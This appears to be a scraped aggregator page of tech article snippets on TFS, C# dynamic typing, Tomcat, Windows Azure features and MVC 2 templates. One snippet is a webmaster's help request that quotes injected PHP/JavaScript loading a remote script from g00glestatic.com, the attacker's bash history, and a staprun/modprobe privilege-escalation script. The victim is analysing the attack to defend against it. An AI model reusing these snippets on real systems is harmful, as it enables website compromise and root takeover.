well. Version Control What about your source code? Well, that is the easiest of the lot. Just create a sub folder for each of your projects/products.   Figure: Creating sub folders in source control is easy as “Right click | Create new folder”. <teamproject>\DEV\Main\ Becomes: <teamproject>\<ProjectName>\DEV\Main\ Conclusion I think it is up to each company to make a call on how you want to configure your Team Projects and it depends completely on how many projects/products you are going to have for each customer including yourself. If we decide to utilise this route it will require some configuration to get our 170+ projects into this format, and I will probably be writing some tools to help. Pros You only have one project to upgrade when a process template changes – After going through an upgrade of over 170 project prior to the changes in the RC I can tell you that that many projects is no fun. Standardises your Process Template – You will always have the same Process implementation across projects/products without exception You get tighter control over the permissions – Yes, you can do this on a standard Team Project, but it gets a lot easier with practice. You can “move” work items from one “product” to another – Have we not always wanted to do that. You can rename your projects – Wahoo: everyone wants to do this, now you can. One set of Reporting Services reports to manage – You set an area and iteration to run reports anyway, so you may as well set both. Simplified Check-In Policies– There is only one set of check-in policies per client. This simplifies administration of policies. Simplified Alerts – As alerts are applied across multiple projects this simplifies your alert rules as per client. Cons All of these cons could be mitigated by a custom tool that helps automate creation of “Sub-projects” within Team Projects. This custom tool could create areas, Iteration, permissions, SharePoint and queries. It just does not exist yet :) You need to configure the Areas and Iterations You need to configure the permissions You may need to configure sub sites for SharePoint (depends on your requirement) – If you have two projects/products in the same Team Project then you will not see the burn down for each one out-of-the-box, but rather a cumulative for the Team Project. This is not really that much of a problem as you would have to configure your burndown graphs for your current iteration anyway. note: When you create a sub site to a TFS linked portal it will inherit the settings of its parent site :) This is fantastic as it means that you can easily create sub sites and then set the Area and Iteration path in each of the reports to be the correct one. Every team wants their own customization (via Ewald Hofman) - small teams of 2 persons against teams of 30 – or even outsourcing – need their own process, you cannot allow that because everybody gets the same work item types. note: Luckily at SSW this is not a problem as our template is standardised across all projects and customers. Large list of builds (via Ewald Hofman) – As the build list in Team Explorer is just a flat list it can get very cluttered. note: I would mitigate this by removing any build that has not been run in over 30 days. The build template and workflow will still be available in version control, but it will clean the list. Feedback Now that I have explained this method, what do you think? What other pros and cons can you see? What do you think of this approach? Will you be using it? What tools would you like to support you?   Technorati Tags: Visual Studio ALM,TFS Administration,TFS,Team Foundation Server,Project Planning,TFS Customisation

    Read the article

  • SQLBeat Podcast – Episode 5 – Kevin Kline Talks With Me About SQL, Professional Development and Book Writin’

    - by SQLBeat
    I thought I would be a ball of intimated nerves when Kevin gladly agreed to speak with me on the podcast this past weekend.  After all, he is Kevin Kline of SQL in a Nutshell fame! As it turned out,  we had a comfortable and enlightening conversation on Apple MacBooks (is that what they are called?), our beginnings in the indistry, the Deep South, health care intiatives and 286′s. I almost pulled the plug when Kevin started down the Oracle path though, and for a moment he looked at me as if I was serious. As always on this podcast, it is all in good fun. The picture is of Kevin and I ( my shirt is mauve not pink by the way) at the after party for SQL Saturday 151 in Orlando, FL where he also did a Pre-Con to a sold out crowd of enthusiastic DBAs. I know they were enthusiastic even though I was not there because one of the attendees was a friend of mine who went on and on and on about the content, kind of like I am doing here.  So I will just stop that and let you proceed to listen. As always, I hope you enjoy and any feedback on this or future episodes is always welcome. Download the MP3

    Read the article

  • C# 4.0: Dynamic Programming

    - by Paulo Morgado
    The major feature of C# 4.0 is dynamic programming. Not just dynamic typing, but dynamic in broader sense, which means talking to anything that is not statically typed to be a .NET object. Dynamic Language Runtime The Dynamic Language Runtime (DLR) is piece of technology that unifies dynamic programming on the .NET platform, the same way the Common Language Runtime (CLR) has been a common platform for statically typed languages. The CLR always had dynamic capabilities. You could always use reflection, but its main goal was never to be a dynamic programming environment and there were some features missing. The DLR is built on top of the CLR and adds those missing features to the .NET platform. The Dynamic Language Runtime is the core infrastructure that consists of: Expression Trees The same expression trees used in LINQ, now improved to support statements. Dynamic Dispatch Dispatches invocations to the appropriate binder. Call Site Caching For improved efficiency. Dynamic languages and languages with dynamic capabilities are built on top of the DLR. IronPython and IronRuby were already built on top of the DLR, and now, the support for using the DLR is being added to C# and Visual Basic. Other languages built on top of the CLR are expected to also use the DLR in the future. Underneath the DLR there are binders that talk to a variety of different technologies: .NET Binder Allows to talk to .NET objects. JavaScript Binder Allows to talk to JavaScript in SilverLight. IronPython Binder Allows to talk to IronPython. IronRuby Binder Allows to talk to IronRuby. COM Binder Allows to talk to COM. Whit all these binders it is possible to have a single programming experience to talk to all these environments that are not statically typed .NET objects. The dynamic Static Type Let’s take this traditional statically typed code: Calculator calculator = GetCalculator(); int sum = calculator.Sum(10, 20); Because the variable that receives the return value of the GetCalulator method is statically typed to be of type Calculator and, because the Calculator type has an Add method that receives two integers and returns an integer, it is possible to call that Sum method and assign its return value to a variable statically typed as integer. Now lets suppose the calculator was not a statically typed .NET class, but, instead, a COM object or some .NET code we don’t know he type of. All of the sudden it gets very painful to call the Add method: object calculator = GetCalculator(); Type calculatorType = calculator.GetType(); object res = calculatorType.InvokeMember("Add", BindingFlags.InvokeMethod, null, calculator, new object[] { 10, 20 }); int sum = Convert.ToInt32(res); And what if the calculator was a JavaScript object? ScriptObject calculator = GetCalculator(); object res = calculator.Invoke("Add", 10, 20); int sum = Convert.ToInt32(res); For each dynamic domain we have a different programming experience and that makes it very hard to unify the code. With C# 4.0 it becomes possible to write code this way: dynamic calculator = GetCalculator(); int sum = calculator.Add(10, 20); You simply declare a variable who’s static type is dynamic. dynamic is a pseudo-keyword (like var) that indicates to the compiler that operations on the calculator object will be done dynamically. The way you should look at dynamic is that it’s just like object (System.Object) with dynamic semantics associated. Anything can be assigned to a dynamic. dynamic x = 1; dynamic y = "Hello"; dynamic z = new List<int> { 1, 2, 3 }; At run-time, all object will have a type. In the above example x is of type System.Int32. When one or more operands in an operation are typed dynamic, member selection is deferred to run-time instead of compile-time. Then the run-time type is substituted in all variables and normal overload resolution is done, just like it would happen at compile-time. The result of any dynamic operation is always dynamic and, when a dynamic object is assigned to something else, a dynamic conversion will occur. Code Resolution Method double x = 1.75; double y = Math.Abs(x); compile-time double Abs(double x) dynamic x = 1.75; dynamic y = Math.Abs(x); run-time double Abs(double x) dynamic x = 2; dynamic y = Math.Abs(x); run-time int Abs(int x) The above code will always be strongly typed. The difference is that, in the first case the method resolution is done at compile-time, and the others it’s done ate run-time. IDynamicMetaObjectObject The DLR is pre-wired to know .NET objects, COM objects and so forth but any dynamic language can implement their own objects or you can implement your own objects in C# through the implementation of the IDynamicMetaObjectProvider interface. When an object implements IDynamicMetaObjectProvider, it can participate in the resolution of how method calls and property access is done. The .NET Framework already provides two implementations of IDynamicMetaObjectProvider: DynamicObject : IDynamicMetaObjectProvider The DynamicObject class enables you to define which operations can be performed on dynamic objects and how to perform those operations. For example, you can define what happens when you try to get or set an object property, call a method, or perform standard mathematical operations such as addition and multiplication. ExpandoObject : IDynamicMetaObjectProvider The ExpandoObject class enables you to add and delete members of its instances at run time and also to set and get values of these members. This class supports dynamic binding, which enables you to use standard syntax like sampleObject.sampleMember, instead of more complex syntax like sampleObject.GetAttribute("sampleMember").

    Read the article

  • Tomcat6 Manager Webapp returns a 404

    - by Noel
    http://localhost:8080/manager/html gives a 404 error on apt-get install of tomcat6 (6.0.28 on JVM 1.6.0_20-b20 on 2.6.35-27-generic amd64). http://localhost:8080/host-manager/html works. Lists one Host name, localhost. Installed tomcat6-admin with apt-get. ls dpkg -l | grep -i tomcat6-admin ii tomcat6-admin 6.0.28-2ubuntu1.1 Servlet and JSP engine -- admin web applications $ cat /usr/share/tomcat6/conf/tomcat-users.xml <tomcat-users> <role rolename="admin"/> <role rolename="manager" /> <user username="tomcatuser" password="Password1" roles="admin,manager"/> </tomcat-users> cat /usr/share/tomcat6/conf/Catalina/localhost/manager.xml <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager" antiResourceLocking="false" privileged="true" /> <role name="manager" /> <user name="manager" password="Password1" roles="manager" /> <user name="tomcatuser" password="Password1" roles="manager" /> Those two files are the only documentation I've seen on how to setup the Manager webapp, and they seem to be compliant with the requirements.

    Read the article

  • Windows Azure: Backup Services Release, Hyper-V Recovery Manager, VM Enhancements, Enhanced Enterprise Management Support

    - by ScottGu
    This morning we released a huge set of updates to Windows Azure.  These new capabilities include: Backup Services: General Availability of Windows Azure Backup Services Hyper-V Recovery Manager: Public preview of Windows Azure Hyper-V Recovery Manager Virtual Machines: Delete Attached Disks, Availability Set Warnings, SQL AlwaysOn Configuration Active Directory: Securely manage hundreds of SaaS applications Enterprise Management: Use Active Directory to Better Manage Windows Azure Windows Azure SDK 2.2: A massive update of our SDK + Visual Studio tooling support All of these improvements are now available to use immediately.  Below are more details about them. Backup Service: General Availability Release of Windows Azure Backup Today we are releasing Windows Azure Backup Service as a general availability service.  This release is now live in production, backed by an enterprise SLA, supported by Microsoft Support, and is ready to use for production scenarios. Windows Azure Backup is a cloud based backup solution for Windows Server which allows files and folders to be backed up and recovered from the cloud, and provides off-site protection against data loss. The service provides IT administrators and developers with the option to back up and protect critical data in an easily recoverable way from any location with no upfront hardware cost. Windows Azure Backup is built on the Windows Azure platform and uses Windows Azure blob storage for storing customer data. Windows Server uses the downloadable Windows Azure Backup Agent to transfer file and folder data securely and efficiently to the Windows Azure Backup Service. Along with providing cloud backup for Windows Server, Windows Azure Backup Service also provides capability to backup data from System Center Data Protection Manager and Windows Server Essentials, to the cloud. All data is encrypted onsite before it is sent to the cloud, and customers retain and manage the encryption key (meaning the data is stored entirely secured and can’t be decrypted by anyone but yourself). Getting Started To get started with the Windows Azure Backup Service, create a new Backup Vault within the Windows Azure Management Portal.  Click New->Data Services->Recovery Services->Backup Vault to do this: Once the backup vault is created you’ll be presented with a simple tutorial that will help guide you on how to register your Windows Servers with it: Once the servers you want to backup are registered, you can use the appropriate local management interface (such as the Microsoft Management Console snap-in, System Center Data Protection Manager Console, or Windows Server Essentials Dashboard) to configure the scheduled backups and to optionally initiate recoveries. You can follow these tutorials to learn more about how to do this: Tutorial: Schedule Backups Using the Windows Azure Backup Agent This tutorial helps you with setting up a backup schedule for your registered Windows Servers. Additionally, it also explains how to use Windows PowerShell cmdlets to set up a custom backup schedule. Tutorial: Recover Files and Folders Using the Windows Azure Backup Agent This tutorial helps you with recovering data from a backup. Additionally, it also explains how to use Windows PowerShell cmdlets to do the same tasks. Below are some of the key benefits the Windows Azure Backup Service provides: Simple configuration and management. Windows Azure Backup Service integrates with the familiar Windows Server Backup utility in Windows Server, the Data Protection Manager component in System Center and Windows Server Essentials, in order to provide a seamless backup and recovery experience to a local disk, or to the cloud. Block level incremental backups. The Windows Azure Backup Agent performs incremental backups by tracking file and block level changes and only transferring the changed blocks, hence reducing the storage and bandwidth utilization. Different point-in-time versions of the backups use storage efficiently by only storing the changes blocks between these versions. Data compression, encryption and throttling. The Windows Azure Backup Agent ensures that data is compressed and encrypted on the server before being sent to the Windows Azure Backup Service over the network. As a result, the Windows Azure Backup Service only stores encrypted data in the cloud storage. The encryption key is not available to the Windows Azure Backup Service, and as a result the data is never decrypted in the service. Also, users can setup throttling and configure how the Windows Azure Backup service utilizes the network bandwidth when backing up or restoring information. Data integrity is verified in the cloud. In addition to the secure backups, the backed up data is also automatically checked for integrity once the backup is done. As a result, any corruptions which may arise due to data transfer can be easily identified and are fixed automatically. Configurable retention policies for storing data in the cloud. The Windows Azure Backup Service accepts and implements retention policies to recycle backups that exceed the desired retention range, thereby meeting business policies and managing backup costs. Hyper-V Recovery Manager: Now Available in Public Preview I’m excited to also announce the public preview of a new Windows Azure Service – the Windows Azure Hyper-V Recovery Manager (HRM). Windows Azure Hyper-V Recovery Manager helps protect your business critical services by coordinating the replication and recovery of System Center Virtual Machine Manager 2012 SP1 and System Center Virtual Machine Manager 2012 R2 private clouds at a secondary location. With automated protection, asynchronous ongoing replication, and orderly recovery, the Hyper-V Recovery Manager service can help you implement Disaster Recovery and restore important services accurately, consistently, and with minimal downtime. Application data in an Hyper-V Recovery Manager scenarios always travels on your on-premise replication channel. Only metadata (such as names of logical clouds, virtual machines, networks etc.) that is needed for orchestration is sent to Azure. All traffic sent to/from Azure is encrypted. You can begin using Windows Azure Hyper-V Recovery today by clicking New->Data Services->Recovery Services->Hyper-V Recovery Manager within the Windows Azure Management Portal.  You can read more about Windows Azure Hyper-V Recovery Manager in Brad Anderson’s 9-part series, Transform the datacenter. To learn more about setting up Hyper-V Recovery Manager follow our detailed step-by-step guide. Virtual Machines: Delete Attached Disks, Availability Set Warnings, SQL AlwaysOn Today’s Windows Azure release includes a number of nice updates to Windows Azure Virtual Machines.  These improvements include: Ability to Delete both VM Instances + Attached Disks in One Operation Prior to today’s release, when you deleted VMs within Windows Azure we would delete the VM instance – but not delete the drives attached to the VM.  You had to manually delete these yourself from the storage account.  With today’s update we’ve added a convenience option that now allows you to either retain or delete the attached disks when you delete the VM:   We’ve also added the ability to delete a cloud service, its deployments, and its role instances with a single action. This can either be a cloud service that has production and staging deployments with web and worker roles, or a cloud service that contains virtual machines.  To do this, simply select the Cloud Service within the Windows Azure Management Portal and click the “Delete” button: Warnings on Availability Sets with Only One Virtual Machine In Them One of the nice features that Windows Azure Virtual Machines supports is the concept of “Availability Sets”.  An “availability set” allows you to define a tier/role (e.g. webfrontends, databaseservers, etc) that you can map Virtual Machines into – and when you do this Windows Azure separates them across fault domains and ensures that at least one of them is always available during servicing operations.  This enables you to deploy applications in a high availability way. One issue we’ve seen some customers run into is where they define an availability set, but then forget to map more than one VM into it (which defeats the purpose of having an availability set).  With today’s release we now display a warning in the Windows Azure Management Portal if you have only one virtual machine deployed in an availability set to help highlight this: You can learn more about configuring the availability of your virtual machines here. Configuring SQL Server Always On SQL Server Always On is a great feature that you can use with Windows Azure to enable high availability and DR scenarios with SQL Server. Today’s Windows Azure release makes it even easier to configure SQL Server Always On by enabling “Direct Server Return” endpoints to be configured and managed within the Windows Azure Management Portal.  Previously, setting this up required using PowerShell to complete the endpoint configuration.  Starting today you can enable this simply by checking the “Direct Server Return” checkbox: You can learn more about how to use direct server return for SQL Server AlwaysOn availability groups here. Active Directory: Application Access Enhancements This summer we released our initial preview of our Application Access Enhancements for Windows Azure Active Directory.  This service enables you to securely implement single-sign-on (SSO) support against SaaS applications (including Office 365, SalesForce, Workday, Box, Google Apps, GitHub, etc) as well as LOB based applications (including ones built with the new Windows Azure AD support we shipped last week with ASP.NET and VS 2013). Since the initial preview we’ve enhanced our SAML federation capabilities, integrated our new password vaulting system, and shipped multi-factor authentication support. We've also turned on our outbound identity provisioning system and have it working with hundreds of additional SaaS Applications: Earlier this month we published an update on dates and pricing for when the service will be released in general availability form.  In this blog post we announced our intention to release the service in general availability form by the end of the year.  We also announced that the below features would be available in a free tier with it: SSO to every SaaS app we integrate with – Users can Single Sign On to any app we are integrated with at no charge. This includes all the top SAAS Apps and every app in our application gallery whether they use federation or password vaulting. Application access assignment and removal – IT Admins can assign access privileges to web applications to the users in their active directory assuring that every employee has access to the SAAS Apps they need. And when a user leaves the company or changes jobs, the admin can just as easily remove their access privileges assuring data security and minimizing IP loss User provisioning (and de-provisioning) – IT admins will be able to automatically provision users in 3rd party SaaS applications like Box, Salesforce.com, GoToMeeting, DropBox and others. We are working with key partners in the ecosystem to establish these connections, meaning you no longer have to continually update user records in multiple systems. Security and auditing reports – Security is a key priority for us. With the free version of these enhancements you'll get access to our standard set of access reports giving you visibility into which users are using which applications, when they were using them and where they are using them from. In addition, we'll alert you to un-usual usage patterns for instance when a user logs in from multiple locations at the same time. Our Application Access Panel – Users are logging in from every type of devices including Windows, iOS, & Android. Not all of these devices handle authentication in the same manner but the user doesn't care. They need to access their apps from the devices they love. Our Application Access Panel will support the ability for users to access access and launch their apps from any device and anywhere. You can learn more about our plans for application management with Windows Azure Active Directory here.  Try out the preview and start using it today. Enterprise Management: Use Active Directory to Better Manage Windows Azure Windows Azure Active Directory provides the ability to manage your organization in a directory which is hosted entirely in the cloud, or alternatively kept in sync with an on-premises Windows Server Active Directory solution (allowing you to seamlessly integrate with the directory you already have).  With today’s Windows Azure release we are integrating Windows Azure Active Directory even more within the core Windows Azure management experience, and enabling an even richer enterprise security offering.  Specifically: 1) All Windows Azure accounts now have a default Windows Azure Active Directory created for them.  You can create and map any users you want into this directory, and grant administrative rights to manage resources in Windows Azure to these users. 2) You can keep this directory entirely hosted in the cloud – or optionally sync it with your on-premises Windows Server Active Directory.  Both options are free.  The later approach is ideal for companies that wish to use their corporate user identities to sign-in and manage Windows Azure resources.  It also ensures that if an employee leaves an organization, his or her access control rights to the company’s Windows Azure resources are immediately revoked. 3) The Windows Azure Service Management APIs have been updated to support using Windows Azure Active Directory credentials to sign-in and perform management operations.  Prior to today’s release customers had to download and use management certificates (which were not scoped to individual users) to perform management operations.  We still support this management certificate approach (don’t worry – nothing will stop working).  But we think the new Windows Azure Active Directory authentication support enables an even easier and more secure way for customers to manage resources going forward.  4) The Windows Azure SDK 2.2 release (which is also shipping today) includes built-in support for the new Service Management APIs that authenticate with Windows Azure Active Directory, and now allow you to create and manage Windows Azure applications and resources directly within Visual Studio using your Active Directory credentials.  This, combined with updated PowerShell scripts that also support Active Directory, enables an end-to-end enterprise authentication story with Windows Azure. Below are some details on how all of this works: Subscriptions within a Directory As part of today’s update, we have associated all existing Window Azure accounts with a Windows Azure Active Directory (and created one for you if you don’t already have one). When you login to the Windows Azure Management Portal you’ll now see the directory name in the URI of the browser.  For example, in the screen-shot below you can see that I have a “scottgu” directory that my subscriptions are hosted within: Note that you can continue to use Microsoft Accounts (formerly known as Microsoft Live IDs) to sign-into Windows Azure.  These map just fine to a Windows Azure Active Directory – so there is no need to create new usernames that are specific to a directory if you don’t want to.  In the scenario above I’m actually logged in using my @hotmail.com based Microsoft ID which is now mapped to a “scottgu” active directory that was created for me.  By default everything will continue to work just like you used to before. Manage your Directory You can manage an Active Directory (including the one we now create for you by default) by clicking the “Active Directory” tab in the left-hand side of the portal.  This will list all of the directories in your account.  Clicking one the first time will display a getting started page that provides documentation and links to perform common tasks with it: You can use the built-in directory management support within the Windows Azure Management Portal to add/remove/manage users within the directory, enable multi-factor authentication, associate a custom domain (e.g. mycompanyname.com) with the directory, and/or rename the directory to whatever friendly name you want (just click the configure tab to do this).  You can also setup the directory to automatically sync with an on-premises Active Directory using the “Directory Integration” tab. Note that users within a directory by default do not have admin rights to login or manage Windows Azure based resources.  You still need to explicitly grant them co-admin permissions on a subscription for them to login or manage resources in Windows Azure.  You can do this by clicking the Settings tab on the left-hand side of the portal and then by clicking the administrators tab within it. Sign-In Integration within Visual Studio If you install the new Windows Azure SDK 2.2 release, you can now connect to Windows Azure from directly inside Visual Studio without having to download any management certificates.  You can now just right-click on the “Windows Azure” icon within the Server Explorer and choose the “Connect to Windows Azure” context menu option to do so: Doing this will prompt you to enter the email address of the username you wish to sign-in with (make sure this account is a user in your directory with co-admin rights on a subscription): You can use either a Microsoft Account (e.g. Windows Live ID) or an Active Directory based Organizational account as the email.  The dialog will update with an appropriate login prompt depending on which type of email address you enter: Once you sign-in you’ll see the Windows Azure resources that you have permissions to manage show up automatically within the Visual Studio server explorer and be available to start using: No downloading of management certificates required.  All of the authentication was handled using your Windows Azure Active Directory! Manage Subscriptions across Multiple Directories If you have already have multiple directories and multiple subscriptions within your Windows Azure account, we have done our best to create a good default mapping of your subscriptions->directories as part of today’s update.  If you don’t like the default subscription-to-directory mapping we have done you can click the Settings tab in the left-hand navigation of the Windows Azure Management Portal and browse to the Subscriptions tab within it: If you want to map a subscription under a different directory in your account, simply select the subscription from the list, and then click the “Edit Directory” button to choose which directory to map it to.  Mapping a subscription to a different directory takes only seconds and will not cause any of the resources within the subscription to recycle or stop working.  We’ve made the directory->subscription mapping process self-service so that you always have complete control and can map things however you want. Filtering By Directory and Subscription Within the Windows Azure Management Portal you can filter resources in the portal by subscription (allowing you to show/hide different subscriptions).  If you have subscriptions mapped to multiple directory tenants, we also now have a filter drop-down that allows you to filter the subscription list by directory tenant.  This filter is only available if you have multiple subscriptions mapped to multiple directories within your Windows Azure Account:   Windows Azure SDK 2.2 Today we are also releasing a major update of our Windows Azure SDK.  The Windows Azure SDK 2.2 release adds some great new features including: Visual Studio 2013 Support Integrated Windows Azure Sign-In support within Visual Studio Remote Debugging Cloud Services with Visual Studio Firewall Management support within Visual Studio for SQL Databases Visual Studio 2013 RTM VM Images for MSDN Subscribers Windows Azure Management Libraries for .NET Updated Windows Azure PowerShell Cmdlets and ScriptCenter I’ll post a follow-up blog shortly with more details about all of the above. Additional Updates In addition to the above enhancements, today’s release also includes a number of additional improvements: AutoScale: Richer time and date based scheduling support (set different rules on different dates) AutoScale: Ability to Scale to Zero Virtual Machines (very useful for Dev/Test scenarios) AutoScale: Support for time-based scheduling of Mobile Service AutoScale rules Operation Logs: Auditing support for Service Bus management operations Today we also shipped a major update to the Windows Azure SDK – Windows Azure SDK 2.2.  It has so much goodness in it that I have a whole second blog post coming shortly on it! :-) Summary Today’s Windows Azure release enables a bunch of great new scenarios, and enables a much richer enterprise authentication offering. If you don’t already have a Windows Azure account, you can sign-up for a free trial and start using all of the above features today.  Then visit the Windows Azure Developer Center to learn more about how to build apps with it. Hope this helps, Scott P.S. In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu

    Read the article

  • Mass targeted malware installed - g00glestatic.com [closed]

    - by Silver89
    Possible Duplicate: My server’s been hacked EMERGENCY I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js" It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access through very secure passwords. The php/javascript code that was added .php files, this code was added: #9c282e# if(!$srvc_counter) { echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>"; $srvc_counter = true;} #/9c282e# .js files, this code was added: /*9c282e*/ var _f = document.createElement('iframe'),_r = 'setAttribute'; _f[_r]('src', 'http://g00glestatic.com/s.js'); _f.style.position = 'absolute';_f.style.width = '10px'; _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1); _f.style.left = '-5540px'; document.write('<div id=\'MIX_ADS\'></div>'); document.getElementById('MIX_ADS').appendChild(_f); /*/9c282e*/ The bash command taken from .bash_history (Some usernames/passwords have been subbed) su -c id $replacedPassword id; id; sudo id; replacedPassword id; cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id; cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id; kill -9 $$;; kill -9 $$;; kill -9 $$; The above seems to move files added to the public_html to the level above? I also have all 4 of the files that were added: .sess_28e2f1bc755ed3ca48b32fbcb55b91a7 .sess_05ee5257fed0ac8e0f12096f4c3c0d20 .sess_bfa542fc2578cce68eb373782c5689b9 .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e Of those four above files, three are none viewable in notepad++ and display null characters, whereas sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of: #!/bin/sh export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin; export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8 export TERM=linux echo -n "-> checking staprun: "; if which staprun 2>&1 | grep -q "no $1"; then flag=1 elif [ -z "`which $1 2>&1`" ]; then flag=1; fi if [ "$flag" = "1" ]; then echo "no staprun, exiting"; exit; else echo "found"; echo "-> trying to exploit... "; printf "install uprobes /bin/sh" > ololo.conf; MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo rm -f ololo.conf fi Other Noticeable Edits Any files that contain: ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified and all system file and directory permissions will have been changed to: x--x--x My steps to remove this malware re uploaded original php/js files to revert any changes Changed all user passwords Modified hosts.allow to a static ip so that only I have access Removed the above 4 files and checked all modified file dates within that directory to check for any other recent modifications, none can be found Conclusion I'm hoping that as they did not have root access, any changes they wished to make higher up failed and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check the malware infection has not spread? Second Conclusion This malware sinks too deep to 'clean', if you get infected I recommend a server nuke and rebuild from backups with increased security. Possibility It's possible that Filezilla ftp passwords were stolen through a trojan as they're unfortunately stored unencrypted. However Trend Micro Titanium has not found any. The settings box to disable passwords being saved has now been ticked, I also recommend that you take this action.

    Read the article

  • MVC 2 Editor Template for Radio Buttons

    - by Steve Michelotti
    A while back I blogged about how to create an HTML Helper to produce a radio button list.  In that post, my HTML helper was “wrapping” the FluentHtml library from MvcContrib to produce the following html output (given an IEnumerable list containing the items “Foo” and “Bar”): 1: <div> 2: <input id="Name_Foo" name="Name" type="radio" value="Foo" /><label for="Name_Foo" id="Name_Foo_Label">Foo</label> 3: <input id="Name_Bar" name="Name" type="radio" value="Bar" /><label for="Name_Bar" id="Name_Bar_Label">Bar</label> 4: </div> With the release of MVC 2, we now have editor templates we can use that rely on metadata to allow us to customize our views appropriately.  For example, for the radio buttons above, we want the “id” attribute to be differentiated and unique and we want the “name” attribute to be the same across radio buttons so the buttons will be grouped together and so model binding will work appropriately. We also want the “for” attribute in the <label> element being set to correctly point to the id of the corresponding radio button.  The default behavior of the RadioButtonFor() method that comes OOTB with MVC produces the same value for the “id” and “name” attributes so this isn’t exactly what I want out the the box if I’m trying to produce the HTML mark up above. If we use an EditorTemplate, the first gotcha that we run into is that, by default, the templates just work on your view model’s property. But in this case, we *also* was the list of items to populate all the radio buttons. It turns out that the EditorFor() methods do give you a way to pass in additional data. There is an overload of the EditorFor() method where the last parameter allows you to pass an anonymous object for “extra” data that you can use in your view – it gets put on the view data dictionary: 1: <%: Html.EditorFor(m => m.Name, "RadioButtonList", new { selectList = new SelectList(new[] { "Foo", "Bar" }) })%> Now we can create a file called RadioButtonList.ascx that looks like this: 1: <%@ Control Language="C#" Inherits="System.Web.Mvc.ViewUserControl" %> 2: <% 3: var list = this.ViewData["selectList"] as SelectList; 4: %> 5: <div> 6: <% foreach (var item in list) { 7: var radioId = ViewData.TemplateInfo.GetFullHtmlFieldId(item.Value); 8: var checkedAttr = item.Selected ? "checked=\"checked\"" : string.Empty; 9: %> 10: <input type="radio" id="<%: radioId %>" name="<%: ViewData.TemplateInfo.HtmlFieldPrefix %>" value="<%: item.Value %>" <%: checkedAttr %>/> 11: <label for="<%: radioId %>"><%: item.Text %></label> 12: <% } %> 13: </div> There are several things to note about the code above. First, you can see in line #3, it’s getting the SelectList out of the view data dictionary. Then on line #7 it uses the GetFullHtmlFieldId() method from the TemplateInfo class to ensure we get unique IDs. We pass the Value to this method so that it will produce IDs like “Name_Foo” and “Name_Bar” rather than just “Name” which is our property name. However, for the “name” attribute (on line #10) we can just use the normal HtmlFieldPrefix property so that we ensure all radio buttons have the same name which corresponds to the view model’s property name. We also get to leverage the fact the a SelectListItem has a Boolean Selected property so we can set the checkedAttr variable on line #8 and use it on line #10. Finally, it’s trivial to set the correct “for” attribute for the <label> on line #11 since we already produced that value. Because the TemplateInfo class provides all the metadata for our view, we’re able to produce this view that is widely re-usable across our application. In fact, we can create a couple HTML helpers to better encapsulate this call and make it more user friendly: 1: public static MvcHtmlString RadioButtonList<TModel, TProperty>(this HtmlHelper<TModel> htmlHelper, Expression<Func<TModel, TProperty>> expression, params string[] items) 2: { 3: return htmlHelper.RadioButtonList(expression, new SelectList(items)); 4: } 5:   6: public static MvcHtmlString RadioButtonList<TModel, TProperty>(this HtmlHelper<TModel> htmlHelper, Expression<Func<TModel, TProperty>> expression, IEnumerable<SelectListItem> items) 7: { 8: var func = expression.Compile(); 9: var result = func(htmlHelper.ViewData.Model); 10: var list = new SelectList(items, "Value", "Text", result); 11: return htmlHelper.EditorFor(expression, "RadioButtonList", new { selectList = list }); 12: } This allows us to simply the call like this: 1: <%: Html.RadioButtonList(m => m.Name, "Foo", "Bar" ) %> In that example, the values for the radio button are hard-coded and being passed in directly. But if you had a view model that contained a property for the collection of items you could call the second overload like this: 1: <%: Html.RadioButtonList(m => m.Name, Model.FooBarList ) %> The Editor templates introduced in MVC 2 definitely allow for much more flexible views/editors than previously available. By knowing about the features you have available to you with the TemplateInfo class, you can take these concepts and customize your editors with extreme flexibility and re-usability.

    Read the article

  • Running sfc /scannow provides the error The specific error code is 0x000006ba [The RPC server is una

    - by leeand00
